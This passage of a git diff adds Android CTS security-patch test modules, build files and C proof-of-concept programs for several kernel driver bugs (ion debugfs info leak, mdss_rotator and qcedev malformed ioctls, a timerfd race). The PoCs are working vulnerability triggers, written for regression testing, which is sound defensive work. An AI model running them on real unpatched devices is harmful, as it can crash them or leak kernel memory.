+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-35644815/poc.c b/hostsidetests/security/securityPatch/Bug-35644815/poc.c
new file mode 100644
index 0000000..d3482e0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35644815/poc.c
@@ -0,0 +1,130 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+// for opendir / readdir
+#include <dirent.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) \
+ printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+static int set_affinity(int num) {
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if (ret == -1) {
+ ERR("[-] set affinity failed");
+ }
+ return ret;
+}
+
+struct ion_debugfs_handle_header {
+ unsigned int version;
+};
+
+struct ion_debugfs_handle_entry {
+ unsigned int heap_id;
+ size_t size;
+ unsigned int flags;
+ unsigned int handle_count;
+ size_t mapped_size;
+};
+
+struct ion_debugfs_handle {
+ struct ion_debugfs_handle_header hdr;
+ struct ion_debugfs_handle_entry entry;
+};
+
+#define TARGET "/sys/kernel/debug/ion/clients/pids/"
+int main(int argc, char *argv[]) {
+ int i, ret, tmpfd;
+ ssize_t rr;
+ char buf[PAGE_SIZE] = {0}, *p;
+ DIR *dir;
+ struct dirent *ent;
+ struct ion_debugfs_handle_header hdr = {0};
+ struct ion_debugfs_handle_entry entry = {0};
+ struct ion_debugfs_handle handle = {0};
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ dir = opendir(TARGET);
+ if (dir == NULL) {
+ ERR("[-] opendir %s failed", TARGET);
+ return -1;
+ }
+
+ while (ent = readdir(dir)) {
+ if (ent->d_type != DT_REG) {
+ continue;
+ }
+
+ memset(buf, 0, PAGE_SIZE);
+ snprintf(buf, PAGE_SIZE, "%s%s", TARGET, ent->d_name);
+
+ tmpfd = open(buf, O_RDWR);
+
+ if (tmpfd == -1) {
+ continue;
+ }
+
+ rr = read(tmpfd, &hdr, sizeof(hdr));
+
+ for (;;) {
+ rr = read(tmpfd, &entry, sizeof(entry));
+ if (rr == 0) {
+ break;
+ }
+
+ if (rr != sizeof(entry)) {
+ break;
+ }
+
+ p = (char *)&entry;
+ p += sizeof(int);
+ printf("INFO DISC FLAG: ");
+ for (i = 0; i < sizeof(int); i++) {
+ printf("%x", p[i]);
+ }
+ }
+ close(tmpfd);
+ }
+ closedir(dir);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/Bug-35950388/Android.mk b/hostsidetests/security/securityPatch/Bug-35950388/Android.mk
new file mode 100644
index 0000000..824e86f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35950388/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-35950388
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+LOCAL_C_INCLUDES += include
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-35950388/local_poc.h b/hostsidetests/security/securityPatch/Bug-35950388/local_poc.h
new file mode 100644
index 0000000..b96e307
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35950388/local_poc.h
@@ -0,0 +1,335 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+
+#ifndef __CMD_H__
+#define __CMD_H__
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+/*
+ * Let any architecture override either of the following before
+ * including this file.
+ */
+
+#ifndef _IOC_SIZEBITS
+# define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+# define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS)-1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS)-1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS)-1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS)-1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT+_IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT+_IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT+_IOC_SIZEBITS)
+
+/*
+ * Direction bits, which any architecture can choose to override
+ * before including this file.
+ */
+
+#ifndef _IOC_NONE
+# define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+# define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+# define _IOC_READ 2U
+#endif
+
+
+
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#define _IOC(dir,type,nr,size) \
+ (((dir) << _IOC_DIRSHIFT) | \
+ ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | \
+ ((size) << _IOC_SIZESHIFT))
+
+
+
+/* used to create numbers */
+#define _IO(type,nr) _IOC(_IOC_NONE,(type),(nr),0)
+#define _IOR(type,nr,size) _IOC(_IOC_READ,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOW(type,nr,size) _IOC(_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+#define _IOWR(type,nr,size) _IOC(_IOC_READ|_IOC_WRITE,(type),(nr),(_IOC_TYPECHECK(size)))
+
+
+
+struct mult_factor {
+ uint32_t numer;
+ uint32_t denom;
+};
+
+struct mdp_rotation_buf_info {
+ uint32_t width;
+ uint32_t height;
+ uint32_t format;
+ struct mult_factor comp_ratio;
+};
+
+struct mdp_rotation_config {
+ uint32_t version;
+ uint32_t session_id;
+ struct mdp_rotation_buf_info input;
+ struct mdp_rotation_buf_info output;
+ uint32_t frame_rate;
+ uint32_t flags;
+ uint32_t reserved[6];
+};
+
+
+struct mdp_rect {
+ uint32_t x;
+ uint32_t y;
+ uint32_t w;
+ uint32_t h;
+};
+
+
+
+
+struct mdp_layer_plane {
+ /* DMA buffer file descriptor information. */
+ int fd;
+
+ /* Pixel offset in the dma buffer. */
+ uint32_t offset;
+
+ /* Number of bytes in one scan line including padding bytes. */
+ uint32_t stride;
+};
+
+#define MAX_PLANES 4
+
+
+struct mdp_layer_buffer {
+ /* layer width in pixels. */
+ uint32_t width;
+
+ /* layer height in pixels. */
+ uint32_t height;
+
+ /*
+ * layer format in DRM-style fourcc, refer drm_fourcc.h for
+ * standard formats
+ */
+ uint32_t format;
+
+ /* plane to hold the fd, offset, etc for all color components */
+ struct mdp_layer_plane planes[MAX_PLANES];
+
+ /* valid planes count in layer planes list */
+ uint32_t plane_count;
+
+ /* compression ratio factor, value depends on the pixel format */
+ struct mult_factor comp_ratio;
+
+ /*
+ * SyncFence associated with this buffer. It is used in two ways.
+ *
+ * 1. Driver waits to consume the buffer till producer signals in case
+ * of primary and external display.
+ *
+ * 2. Writeback device uses buffer structure for output buffer where
+ * driver is producer. However, client sends the fence with buffer to
+ * indicate that consumer is still using the buffer and it is not ready
+ * for new content.
+ */
+ int fence;
+
+ /* 32bits reserved value for future usage. */
+ uint32_t reserved;
+};
+
+
+struct mdp_rotation_item {
+ /* rotation request flag */
+ uint32_t flags;
+
+ /* Source crop rectangle */
+ struct mdp_rect src_rect;
+
+ /* Destination rectangle */
+ struct mdp_rect dst_rect;
+
+ /* Input buffer for the request */
+ struct mdp_layer_buffer input;
+
+ /* The output buffer for the request */
+ struct mdp_layer_buffer output;
+
+ /*
+ * DMA pipe selection for this request by client:
+ * 0: DMA pipe 0
+ * 1: DMA pipe 1
+ * or MDSS_ROTATION_HW_ANY if client wants
+ * driver to allocate any that is available
+ */
+ uint32_t pipe_idx;
+
+ /*
+ * Write-back block selection for this request by client:
+ * 0: Write-back block 0
+ * 1: Write-back block 1
+ * or MDSS_ROTATION_HW_ANY if client wants
+ * driver to allocate any that is available
+ */
+ uint32_t wb_idx;
+
+ /* Which session ID is this request scheduled on */
+ uint32_t session_id;
+
+ /* 32bits reserved value for future usage */
+ uint32_t reserved[6];
+};
+
+struct mdp_rotation_request {
+ /* 32bit version indicates the request structure */
+ uint32_t version;
+
+ uint32_t flags;
+
+ /* Number of rotation request items in the list */
+ uint32_t count;
+
+ /* Pointer to a list of rotation request items */
+ struct mdp_rotation_item __user *list;
+
+ /* 32bits reserved value for future usage*/
+ uint32_t reserved[6];
+};
+
+#define MDSS_ROTATOR_IOCTL_MAGIC 'w'
+
+/* open a rotation session */
+#define MDSS_ROTATION_OPEN \
+ _IOWR(MDSS_ROTATOR_IOCTL_MAGIC, 1, struct mdp_rotation_config *)
+
+/* change the rotation session configuration */
+#define MDSS_ROTATION_CONFIG \
+ _IOWR(MDSS_ROTATOR_IOCTL_MAGIC, 2, struct mdp_rotation_config *)
+
+/* queue the rotation request */
+#define MDSS_ROTATION_REQUEST \
+ _IOWR(MDSS_ROTATOR_IOCTL_MAGIC, 3, struct mdp_rotation_request *)
+
+/* close a rotation session with the specified rotation session ID */
+#define MDSS_ROTATION_CLOSE _IOW(MDSS_ROTATOR_IOCTL_MAGIC, 4, unsigned int)
+
+
+
+
+#define MDP_IMGTYPE_END 0x100
+#define MDP_IMGTYPE2_START 0x10000
+
+enum {
+ MDP_RGB_565, /* RGB 565 planer */
+ MDP_XRGB_8888, /* RGB 888 padded */
+ MDP_Y_CBCR_H2V2, /* Y and CbCr, pseudo planer w/ Cb is in MSB */
+ MDP_Y_CBCR_H2V2_ADRENO,
+ MDP_ARGB_8888, /* ARGB 888 */
+ MDP_RGB_888, /* RGB 888 planer */
+ MDP_Y_CRCB_H2V2, /* Y and CrCb, pseudo planer w/ Cr is in MSB */
+ MDP_YCRYCB_H2V1, /* YCrYCb interleave */
+ MDP_CBYCRY_H2V1, /* CbYCrY interleave */
+ MDP_Y_CRCB_H2V1, /* Y and CrCb, pseduo planer w/ Cr is in MSB */
+ MDP_Y_CBCR_H2V1, /* Y and CrCb, pseduo planer w/ Cr is in MSB */
+ MDP_Y_CRCB_H1V2,
+ MDP_Y_CBCR_H1V2,
+ MDP_RGBA_8888, /* ARGB 888 */
+ MDP_BGRA_8888, /* ABGR 888 */
+ MDP_RGBX_8888, /* RGBX 888 */
+ MDP_Y_CRCB_H2V2_TILE, /* Y and CrCb, pseudo planer tile */
+ MDP_Y_CBCR_H2V2_TILE, /* Y and CbCr, pseudo planer tile */
+ MDP_Y_CR_CB_H2V2, /* Y, Cr and Cb, planar */
+ MDP_Y_CR_CB_GH2V2, /* Y, Cr and Cb, planar aligned to Android YV12 */
+ MDP_Y_CB_CR_H2V2, /* Y, Cb and Cr, planar */
+ MDP_Y_CRCB_H1V1, /* Y and CrCb, pseduo planer w/ Cr is in MSB */
+ MDP_Y_CBCR_H1V1, /* Y and CbCr, pseduo planer w/ Cb is in MSB */
+ MDP_YCRCB_H1V1, /* YCrCb interleave */
+ MDP_YCBCR_H1V1, /* YCbCr interleave */
+ MDP_BGR_565, /* BGR 565 planer */
+ MDP_BGR_888, /* BGR 888 */
+ MDP_Y_CBCR_H2V2_VENUS,
+ MDP_BGRX_8888, /* BGRX 8888 */
+ MDP_RGBA_8888_TILE, /* RGBA 8888 in tile format */
+ MDP_ARGB_8888_TILE, /* ARGB 8888 in tile format */
+ MDP_ABGR_8888_TILE, /* ABGR 8888 in tile format */
+ MDP_BGRA_8888_TILE, /* BGRA 8888 in tile format */
+ MDP_RGBX_8888_TILE, /* RGBX 8888 in tile format */
+ MDP_XRGB_8888_TILE, /* XRGB 8888 in tile format */
+ MDP_XBGR_8888_TILE, /* XBGR 8888 in tile format */
+ MDP_BGRX_8888_TILE, /* BGRX 8888 in tile format */
+ MDP_YCBYCR_H2V1, /* YCbYCr interleave */
+ MDP_RGB_565_TILE, /* RGB 565 in tile format */
+ MDP_BGR_565_TILE, /* BGR 565 in tile format */
+ MDP_ARGB_1555, /*ARGB 1555*/
+ MDP_RGBA_5551, /*RGBA 5551*/
+ MDP_ARGB_4444, /*ARGB 4444*/
+ MDP_RGBA_4444, /*RGBA 4444*/
+ MDP_RGB_565_UBWC,
+ MDP_RGBA_8888_UBWC,
+ MDP_Y_CBCR_H2V2_UBWC,
+ MDP_RGBX_8888_UBWC,
+ MDP_Y_CRCB_H2V2_VENUS,
+ MDP_IMGTYPE_LIMIT,
+ MDP_RGB_BORDERFILL, /* border fill pipe */
+ MDP_XRGB_1555,
+ MDP_RGBX_5551,
+ MDP_XRGB_4444,
+ MDP_RGBX_4444,
+ MDP_ABGR_1555,
+ MDP_BGRA_5551,
+ MDP_XBGR_1555,
+ MDP_BGRX_5551,
+ MDP_ABGR_4444,
+ MDP_BGRA_4444,
+ MDP_XBGR_4444,
+ MDP_BGRX_4444,
+ MDP_ABGR_8888,
+ MDP_XBGR_8888,
+ MDP_RGBA_1010102,
+ MDP_ARGB_2101010,
+ MDP_RGBX_1010102,
+ MDP_XRGB_2101010,
+ MDP_BGRA_1010102,
+ MDP_ABGR_2101010,
+ MDP_BGRX_1010102,
+ MDP_XBGR_2101010,
+ MDP_RGBA_1010102_UBWC,
+ MDP_RGBX_1010102_UBWC,
+ MDP_Y_CBCR_H2V2_P010,
+ MDP_Y_CBCR_H2V2_TP10_UBWC,
+ MDP_CRYCBY_H2V1, /* CrYCbY interleave */
+ MDP_IMGTYPE_LIMIT1 = MDP_IMGTYPE_END,
+ MDP_FB_FORMAT = MDP_IMGTYPE2_START, /* framebuffer format */
+ MDP_IMGTYPE_LIMIT2 /* Non valid image type after this enum */
+};
+
+#endif
+
diff --git a/hostsidetests/security/securityPatch/Bug-35950388/poc.c b/hostsidetests/security/securityPatch/Bug-35950388/poc.c
new file mode 100644
index 0000000..c084a47
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-35950388/poc.c
@@ -0,0 +1,95 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+
+#define GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/ion.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include "local_poc.h"
+
+int fd;
+int id;
+
+int main(int argc, char **argv) {
+ int ret, i, count;
+ struct mdp_rotation_request req;
+ struct mdp_rotation_item item;
+
+ struct mdp_rotation_config config;
+
+ fd = open("/dev/mdss_rotator", O_RDONLY, 0);
+ if (fd < 0) {
+ return -1;
+ }
+
+ config.input.format = MDP_Y_CBCR_H2V2;
+ config.output.format = MDP_Y_CBCR_H2V2;
+ config.input.height = 4;
+ config.input.width = 4;
+ config.output.height = 4;
+ config.output.width = 4;
+ config.flags = 0;
+ ret = ioctl(fd, MDSS_ROTATION_OPEN, &config);
+ if (ret < 0) {
+ goto failed;
+ } else {
+ id = config.session_id;
+ }
+
+ item.wb_idx = 0xFFFFFFFF;
+ item.pipe_idx = item.wb_idx;
+ item.session_id = id;
+
+ item.src_rect.w = config.input.width;
+ item.src_rect.h = config.input.height;
+ item.input.format = config.input.format;
+
+ item.dst_rect.w = config.output.width;
+ item.dst_rect.h = config.output.height;
+ item.output.format = config.output.format;
+
+ item.src_rect.x = 1;
+ item.src_rect.y = 1;
+ item.dst_rect.x = 1;
+ item.dst_rect.y = 1;
+
+ item.input.width = 8;
+ item.input.height = 8;
+ item.output.height = 8;
+ item.output.width = 8;
+
+ item.input.plane_count = 0x0000FFFF;
+ req.count = 1;
+ req.list = &item;
+ req.flags = 0;
+ ret = ioctl(fd, MDSS_ROTATION_REQUEST, &req);
+
+ failed:
+ close(fd);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/Bug-36266767/Android.mk b/hostsidetests/security/securityPatch/Bug-36266767/Android.mk
new file mode 100644
index 0000000..2a1edd0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-36266767/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-36266767
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-36266767/poc.c b/hostsidetests/security/securityPatch/Bug-36266767/poc.c
new file mode 100644
index 0000000..e534054
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-36266767/poc.c
@@ -0,0 +1,72 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <sys/timerfd.h>
+#include <sys/time.h>
+#include <time.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <signal.h>
+
+#define THREAD_NUM 2
+
+pthread_t thread_id[THREAD_NUM+1] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int fd;
+struct itimerspec new_value;
+
+void* child_ioctl_0(void* no_use)
+{
+ int ret = 1;
+
+ while(1){
+ timerfd_settime(fd, 0x3, &new_value, NULL);
+ timerfd_settime(fd, 0x0, &new_value, NULL);
+ }
+}
+
+int main(int argc, char *argv[])
+{
+ int i;
+ new_value.it_value.tv_sec = 0;
+ new_value.it_value.tv_nsec = 0;
+ new_value.it_interval.tv_sec = 0;
+ new_value.it_interval.tv_nsec = 0;
+
+ fd = timerfd_create(CLOCK_REALTIME, 0);
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i = i+1) {
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child_ioctl_0, NULL);
+ }
+
+ while(1) {
+ fd = timerfd_create(CLOCK_REALTIME, 0);
+ usleep(5);
+ close(fd);
+ }
+}
diff --git a/hostsidetests/security/securityPatch/Bug-36591162/Android.mk b/hostsidetests/security/securityPatch/Bug-36591162/Android.mk
new file mode 100644
index 0000000..ee17cb7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-36591162/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-36591162
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-36591162/poc.c b/hostsidetests/security/securityPatch/Bug-36591162/poc.c
new file mode 100644
index 0000000..33ee5f6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-36591162/poc.c
@@ -0,0 +1,89 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <sys/ioctl.h>
+#include <sys/mount.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <pthread.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+enum qcedev_sha_alg_enum {
+ QCEDEV_ALG_SHA1 = 0,
+ QCEDEV_ALG_SHA256 = 1,
+ QCEDEV_ALG_SHA1_HMAC = 2,
+ QCEDEV_ALG_SHA256_HMAC = 3,
+ QCEDEV_ALG_AES_CMAC = 4,
+ QCEDEV_ALG_SHA_ALG_LAST
+};
+
+struct buf_info {
+ union {
+ uint32_t offset;
+ uint8_t *vaddr;
+ };
+ uint32_t len;
+};
+
+struct qcedev_sha_op_req {
+ struct buf_info data[16];
+ uint32_t entries;
+ uint32_t data_len;
+ uint8_t digest[32];
+ uint32_t diglen;
+ uint8_t *authkey;
+ uint32_t authklen;
+ enum qcedev_sha_alg_enum alg;
+};
+
+#define QCEDEV_IOC_MAGIC 0x87
+
+#define QCEDEV_IOCTL_SHA_INIT_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 3, struct qcedev_sha_op_req)
+#define QCEDEV_IOCTL_SHA_UPDATE_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 4, struct qcedev_sha_op_req)
+#define QCEDEV_IOCTL_SHA_FINAL_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 5, struct qcedev_sha_op_req)
+
+void main() {
+ int f = open("/dev/qce", 0);
+
+ struct qcedev_sha_op_req arg;
+ memset(&arg, 0, sizeof(arg));
+ arg.alg = QCEDEV_ALG_AES_CMAC;
+ arg.entries = 1;
+ arg.authklen = 16;
+ char *key = malloc(arg.authklen);
+ arg.authkey = key;
+ arg.data_len = 256;
+
+ arg.data[0].len = arg.data_len;
+ char *data = malloc(arg.data_len);
+ arg.data[0].vaddr = data;
+ int r = ioctl(f, QCEDEV_IOCTL_SHA_INIT_REQ, &arg);
+
+ arg.diglen = 0x8000;
+ r = ioctl(f, QCEDEV_IOCTL_SHA_UPDATE_REQ, &arg);
+ r = ioctl(f, QCEDEV_IOCTL_SHA_FINAL_REQ, &arg);
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-10231/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-10231/Android.mk
new file mode 100644
index 0000000..3ba801e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-10231/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-10231
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
